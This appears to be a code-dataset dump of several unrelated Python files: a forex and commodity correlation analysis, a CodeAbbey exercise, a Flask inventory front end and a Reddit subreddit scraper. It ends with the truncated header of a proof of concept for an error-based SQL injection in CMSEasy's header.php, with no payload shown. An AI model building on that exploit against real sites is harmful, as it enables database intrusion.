2))\nprint(\"Mode XAUEUR Price(s) (Jan 2014 - Feb 2021) :\", mode_xaueur)\nmypltly.plot_on_webpage(fig)\n\n#%%\n# Finding the Difference Between XAUUSD and XAUEUR\nmerge_df[\"XAUUSD_XAUEUR_Diff_Price\"] = (merge_df[\"XAUUSD_Price\"].astype(float) - merge_df[\"XAUEUR_Price\"].astype(float))\nmerge_df[\"XAUEUR / XAUUSD Price\"] = (merge_df[\"XAUUSD_Price\"].astype(float) / merge_df[\"XAUEUR_Price\"].astype(float))\n\n# EUR and USD Currency Strength is taken as (XAUEUR - XAUUSD) in this case\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# 用 XAUUSD_XAUEUR_Diff_Price 表示 EUR和USD的货币强度.\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"EUR and USD Currency Strength\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EUR/USD\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"EUR/USD Versus EUR and USD Currency Strength\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"EUR and USD Currency Strength\", secondary_y=False)\nfig.update_yaxes(title_text=\"EUR/USD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\nprint(\"Correlation Between Currency Strength of EUR and USD (XAUEUR - XAUUSD) and EUR/USD :\", round(stats.pearsonr(merge_df.XAUUSD_XAUEUR_Diff_Price, merge_df.EURUSD_Price)[0],4))\n# 我们可以看到欧元和美元的货币强度与欧元/美元价格密切相关。从2015年开始,它们的走势甚至似乎是相互同步的。\n\n#%% 市场间关系[商品]\n# 长期以来,黄金和石油等大宗商品一直是货币的衡量标准,无论是通过直接影响货币价格的手段,还是通过其与利率的相关性,似乎大宗商品在衡量外汇市场的未来走势中发挥了至关重要的作用。让我们看看黄金和石油与我们手头的一些数据的相关性.\n# Oil Dataframe\noil_df = myMT5Pro.getsymboldata(\"XTIUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\noil_df.rename(columns = {'Close' : 'Oil_Price', 'Tick_volume' : 'Oil_Volume', \"Open\": \"Oil_Open\", \"High\":\"Oil_High\", \"Low\":\"Oil_Low\"}, inplace=True)\noil_df = oil_df[::-1].reset_index()\n# del oil_df[\"index\"]\noil_df = oil_df[712:]\noil_df[\"Date\"] = oil_df[\"Time\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\noil_df.reset_index()\n\n# Gold Dataframe\ngold_prices_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\ngold_prices_df.rename(columns={\"Time\":\"Date\", \"Close\": \"Gold_Price\"}, inplace=True)\ngold_prices_df[\"Date\"] = gold_prices_df[\"Date\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\ngold_prices_df = gold_prices_df.dropna()\n# us_interest_rates = us_interest_rates[us_interest_rates['Date'].between(\"02/01/2014\", \"08/02/2021\")]\nstart_date = \"02/01/2014\"\nend_date = \"08/02/2021\"\ngold_prices_df = gold_prices_df[gold_prices_df[gold_prices_df.Date==(start_date)].index[0] : gold_prices_df[gold_prices_df.Date==(end_date)].index[0]+pd.to_timedelta(1, unit='D')].reset_index()\n\n# USDX Dataframe\nusd_index_df = myMT5Pro.getsymboldata(\"USDX.index\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nusd_index_df.rename(columns = {\"Time\":\"Date\",'Close' : 'USDX_Price', \"Open\": \"USDX_Open\", \"High\":\"USDX_High\", \"Low\":\"USDX_Low\", \"Tick_volume\":\"USDX_Vol\", \"Rate\":\"USDX_Change%\"}, inplace=True)\nusd_index_df[\"Date\"] = usd_index_df[\"Date\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\n\n# US Interest Rates\nus_interest_rates = pd.read_csv(__mypath__.get_current_workpath() + r\"\\Project_文章调试\\Kaggle\\data\\fed-funds-rate-historical-chart_Mar2021.csv\")\nus_interest_rates.rename(columns={\"date\":\"Date\", \" value\": \"US_Interest_Rates_Value\"}, inplace=True)\nus_interest_rates[\"Date\"] = us_interest_rates[\"Date\"].apply(lambda x:datetime.strptime(x, \"%m/%d/%Y\").strftime(\"%d/%m/%Y\"))\nus_interest_rates = us_interest_rates.dropna()\n# us_interest_rates = us_interest_rates[us_interest_rates['Date'].between(\"02/01/2014\", \"08/02/2021\")]\nstart_date = \"02/01/2014\"\nend_date = \"08/02/2021\"\nus_interest_rates = us_interest_rates[us_interest_rates[us_interest_rates.Date==(start_date)].index[0] : us_interest_rates[us_interest_rates.Date==(end_date)].index[0]+1].reset_index().drop(\"index\", axis=1)\n\n# Merging Dataframe\nmerge_df = pd.merge(merge_df, oil_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, gold_prices_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, usd_index_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, us_interest_rates, how=\"left\", on=\"Date\")\nmerge_df[\"Gold/Oil\"] = merge_df[\"Gold_Price\"] / merge_df[\"Oil_Price\"]\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"XAUEUR - XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus XAUEUR - XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUUSD_XAUEUR_Diff Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"XAUEUR / XAUUSD Price\"], name=\"XAUEUR / XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus XAUEUR/XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUEUR/XAUUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%% # 分析黄金\nmerge_df.corr(method='pearson')\ncorr_df = merge_df[[\"Gold_Price\", \"USDX_Price\", \"EURUSD_Price\", \"XAUEUR / XAUUSD Price\", \"XAUUSD_XAUEUR_Diff_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Correlation Heatmap\")\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n#%%\nxau_eur_df.XAUEUR_Price.corr(xau_usd_df.XAUUSD_Price)\n\n# **反常现象**\n# 有趣的是,黄金与欧元兑美元和 XAUUSD/XAUEUR 的相关性只有0.15左右,但与 XAUEUR-XAUUSD 的相关性为0.58。从图表中,我们可以清楚地看到在以下时期,XAUEUR - XAUUSD和(欧元兑美元和XAUUSD / XAUEUR)之间的差异:\n# 2016年6月 - 2016年12月\n# 2020年3月 - 2021年2月\n# 一般来说,对XAUEUR - XAUUSD的影响比XAUEUR / XAUUSD或欧元/美元的影响要大,因为两个值的减法的影响通常比两个值的除法要大(例如黄金和欧元/美元)。考虑到在这两个时期发生的一些全球事件,很容易理解为什么我们的相关性在两个非常相似的价值之间看到如此大的差异。\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"XAUEUR - XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus XAUEUR - XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUUSD_XAUEUR_Diff Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"XAUEUR / XAUUSD Price\"], name=\"XAUEUR / XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus XAUEUR/XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUEUR/XAUUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%% # 分析油\nmerge_df.corr(method='pearson')\ncorr_df = merge_df[[\"Oil_Price\", \"USDX_Price\", \"EURUSD_Price\", \"XAUEUR / XAUUSD Price\", \"XAUUSD_XAUEUR_Diff_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n# **见解和发现**\n# 与黄金相比,石油与欧元或美元之间的关系乍一看没有太多的反常之处,还需要讨论。\n# 石油通常与美元呈负相关关系,并与欧元/美元一起移动。由于石油是以美元定价的,而美国又是石油的净进口国,因此很容易看出这两者之间的负相关关系是如何建立的。\n# 当然,石油在其他货币之间也有有趣的相关性。然而,这将在进一步的EDA中讨论,深入探讨影响外汇市场的特定商品/市场/资产。\n\n\n#%% Gold / Oil Ratio\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus Oil Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"Gold_Price\", \"Oil_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Gold and Oil Prices Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n#%%\n# Overview of Data\nsns.displot(merge_df['Gold/Oil'])\nplt.show()\n\nprint(\"Skewness: %f\" % merge_df['Gold/Oil'].skew())\nprint(\"Kurtosis: %f\" % merge_df['Gold/Oil'].kurt())\nprint(merge_df['Gold/Oil'].describe())\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.US_Interest_Rates_Value, name=\"US Interest Rate\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus US Interest Rates\"\n)\n\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"US Interest Rates Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus Gold Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus Oil Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"Gold/Oil\", \"US_Interest_Rates_Value\", \"EURUSD_Price\", \"USDX_Price\", \"Gold_Price\", \"Oil_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n# 虽然我们的其他数据与黄金/石油价格似乎没有太多的密切关联,但黄金/石油价格仍然是一个重要的因素,值得关注。\n# 黄金和石油通常被认为是与美元反向的。黄金在危机中起到了 \"避风港 \"的投资作用,而石油与美元的反向关系源于它是以美元定价的,当美元上涨时,购买一桶石油所需的美元就会减少。\n# 注意到它们与美元的反向关系的明显区别,黄金/石油比率使我们能够确定美元价格变动的具体原因/事件。\n\n#%%\n# 风险偏好\n# 在参与市场时,风险管理是必不可少的。许多参与者寻求增加收益,同时试图减少/限制通常带来的下行风险的增加。这通常是以分散投资和选择 \"安全 \"和波动较小的证券的形式出现。\n# 虽然风险管理对于保护个人资产至关重要,但全球风险偏好确实对外汇市场产生了重大影响,无论是直接还是间接。在本节中,我们将探讨如何衡量投资者的风险偏好并分析其对外汇市场的影响**。\n# 波动率指数、股票指数和美元/日元\ndaily_usdjpy_df[\"Date\"] = modify_datetime(daily_usdjpy_df)\n# vix_df[\"Date\"] = modify_datetime(vix_df)\nsnp_500_df[\"Date\"] = modify_datetime(snp_500_df)\n\ndaily_usdjpy_df.rename(columns = {'Close' : 'USDJPY_Price', \"Open\": \"USDJPY_Open\", \"High\":\"USDJPY_High\", \"Low\":\"USDJPY_Low\", \"Change %\":\"USDJPY_Change %\"}, inplace=True)\n# vix_df.rename(columns = {'Price' : 'VIX_Price', \"Open\": \"VIX_Open\", \"High\":\"VIX_High\", \"Low\":\"VIX_Low\", \"Change %\":\"VIX_Change %\"}, inplace=True)\nsnp_500_df.rename(columns = {'Close' : 'S&P500_Price', \"Open\": \"S&P500_Open\", \"High\":\"S&P500_High\", \"Low\":\"S&P500_Low\", \"Change %\":\"S&P500_Change %\"}, inplace=True)\n\nmerge_df = pd.merge(merge_df, daily_usdjpy_df, how=\"left\", on=\"Date\")\n# merge_df = pd.merge(merge_df, vix_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, snp_500_df, how=\"left\", on=\"Date\")\nmerge_df[\"S&P500_Price\"] = merge_df[\"S&P500_Price\"].astype(str)\n# merge_df[\"S&P500_Price\"] = remove_comma(merge_df, \"S&P500_Price\")\nmerge_df[\"S&P500_Price\"] = merge_df[\"S&P500_Price\"].astype(float)\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"S&P500_Price\"], name=\"S&P500 Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDJPY_Price, name=\"USDJPY Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"S&P500 Prices Versus USDJPY Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"S&P500 Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDJPY Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"S&P500_Price\", \"USDJPY_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"S&P500 / USDJPY Prices Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MuSaCN/PythonProjects2023-02-14","sub_path":"Project_Kaggle/5. Forex EDA.py","file_name":"5. Forex EDA.py","file_ext":"py","file_size_in_byte":33570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"33093185756","text":"from csv import reader\n\n\ndef stringToInteger():\n \"\"\"\n This function open a cvs file and return a list of integer.\n :return:\n \"\"\"\n arq = open(\"problem315.csv\")\n l1 = reader(arq, delimiter=\" \")\n l1 = list(l1)\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n l1[i][k] = int(l1[i][k])\n print(l1)\n return l1\n\n\ndef countTheCommonFactors(l1):\n \"\"\"\n This function take a parameter given by the function above and\n returns for each pair of numbers all common factors produced by\n iterating of the data.\n :param l1:\n :return:\n \"\"\"\n n, set1, set2, set3, cont, l2 = 0, {(), 1}, {(), 1}, {()}, 0, []\n set1.discard(())\n set2.discard(())\n set3.discard(())\n while n < 8:\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n a = l1[i][k]\n c = a\n c = c + 1\n print(c)\n for m in range(2, 100_000):\n while c % m == 0 and m != c:\n c /= m\n set1.add(k)\n n += 1\n n = 0\n while n < 8:\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n b = l1[i][k]\n d = b\n d += 1\n for m in range(2, 100_000):\n while d % m == 0 and m != d:\n d /= m\n set2.add(m)\n n += 1\n set3 = set1.intersection(set2)\n cont = len(set3)\n l2.append(cont)\n return print(*l2)\n\n\ncountTheCommonFactors(stringToInteger())\n","repo_name":"Curio5813/CodeAbbey","sub_path":"problem315.py","file_name":"problem315.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29142530822","text":"\n# include the flask library\nfrom flask import Flask, render_template, request, redirect, url_for, flash, json, jsonify\nfrom flask_restful import Resource, Api\n# from flask_cors import CORS\nimport requests\n\napp = Flask(__name__)\n# CORS(app)\n\napp.secret_key = 'mysecretkey'\n\n\n@app.route('/')\ndef index():\n url = 'https://api-sportcenter.herokuapp.com/articles'\n # url = 'http://localhost:6000/articles'\n res = requests.get(url)\n data = res.json()\n print(data)\n return render_template('index.html', articles=data)\n\n\n@app.route('/add', methods=['POST'])\ndef add_article():\n if request.method == 'POST':\n article = request.form['article']\n description = request.form['description']\n price = request.form['price']\n stock = request.form['stock']\n\n url = 'https://api-sportcenter.herokuapp.com/articles'\n # url = 'http://localhost:6000/articles'\n payload = {'article': '' + article + '', 'description': '' + description + '',\n 'price': '' + price + '', 'stock': '' + stock + ''}\n headers = {'content-type': 'application/json'}\n res = requests.post(url, data=json.dumps(payload), headers=headers)\n print(res.content)\n flash('Article Added Succesfully')\n return redirect(url_for('index'))\n\n\n@app.route('/edit/')\ndef edit_article(sku):\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n # req = 'http://localhost:6000/article/' + str(sku)\n res = requests.get(req)\n data = res.json()\n return render_template('edit_article.html', article=data)\n\n\n@app.route('/update/', methods=['POST'])\ndef update_article(sku):\n if request.method == 'POST':\n print(sku)\n\n upd_article = request.form['article']\n upd_description = request.form['description']\n upd_price = request.form['price']\n upd_stock = request.form['stock']\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n print(req)\n body = {'article': ''+str(upd_article)+'', 'description': '' +\n str(upd_description) + '', 'price': '' + str(upd_price) + '', 'stock': '' + str(upd_stock) + ''}\n print(body)\n headers = {'content-type': 'application/json'}\n res = requests.put(req, data=json.dumps(body), headers=headers)\n print(res)\n print(res.content)\n\n flash('Contact Updated Successfully')\n return redirect(url_for('index'))\n\n\n@app.route(\"/delete/\")\ndef delete_article(sku):\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n # req = 'http://localhost:6000/article/' + str(sku)\n res = requests.delete(req)\n flash('Article Deleted Succesfully')\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=False)\n","repo_name":"c3m3z4c4/HelloPyFlask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"8841375160","text":"import re\nimport sys\n\nfrom bs4 import BeautifulSoup\n\nimport url_database\nimport driver_manager\n\ndef scrape_subreddits(driver):\n subreddit_set = set()\n\n # Get the page source after scrolling\n page_source = driver.page_source\n\n # Parse the page source with BeautifulSoup as before\n soup = BeautifulSoup(page_source, \"html.parser\")\n\n # Extract the subreddit names from the href attribute and store them in a set\n a_tags = soup.find_all(\"a\", class_=\"absolute inset-0\")\n for a_tag in a_tags:\n href = a_tag.get(\"href\")\n match = re.search(r'/r/([^/]+)/', href)\n if match:\n subreddit_set.add('/r/' + match.group(1))\n\n return subreddit_set\n\n# Class for crawling home page to get subreddits\n\n\nclass HomePageCrawler():\n def __init__(self, scroll_number: int, threads=1):\n self.scroll_number = scroll_number\n self.threads = threads\n\n self.database = url_database.URLDatabase('seen_subs')\n self.chrome_driver = driver_manager.ParralelDriverManager(self.threads)\n\n\n # scrape more URLs\n def scrape(self) -> set:\n self.chrome_driver.populate_url_pool(['https://reddit.com']*self.threads)\n\n self.chrome_driver.parallel_url_task(self.chrome_driver.scroll_and_wait, self.scroll_number)\n\n self.chrome_driver.populate_url_pool(['https://reddit.com']*self.threads)\n\n current = self.chrome_driver.parallel_url_task(scrape_subreddits)\n\n print(current)\n\n self.chrome_driver.stop_drivers()\n\n self.database.set_current(current)\n\n subreddits = self.database.get_unique()\n\n if not subreddits:\n clear = input(\"Cannot find any unique subreddits, type y to clear cache & retry: \")\n if clear == 'y':\n self.database.clear()\n subreddits = self.database.get_unique()\n else:\n sys.exit()\n return subreddits\n","repo_name":"Qiwi2681/fra-scraper","sub_path":"home_scraper.py","file_name":"home_scraper.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37428736838","text":"\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nname: cmseasy header.php 报错注入\nreferer: http://www.wooyun.org/bugs/wooyun-2015-0137013\nauthor: 